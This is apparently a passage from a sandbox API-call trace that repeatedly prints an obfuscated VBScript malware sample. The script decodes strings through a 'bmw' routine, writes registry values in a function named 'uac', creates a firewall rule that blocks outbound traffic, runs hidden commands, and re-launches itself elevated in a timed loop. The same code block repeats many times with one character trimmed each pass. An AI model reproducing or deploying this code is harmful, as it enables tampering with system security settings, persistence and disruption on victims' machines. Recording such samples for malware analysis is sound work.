bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.020] wcsncmp (_String1="newRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.020] wcsncmp (_String1="ewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.020] wcsncmp (_String1="wRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.021] wcsncmp (_String1="Rule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.021] wcsncmp (_String1="ule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 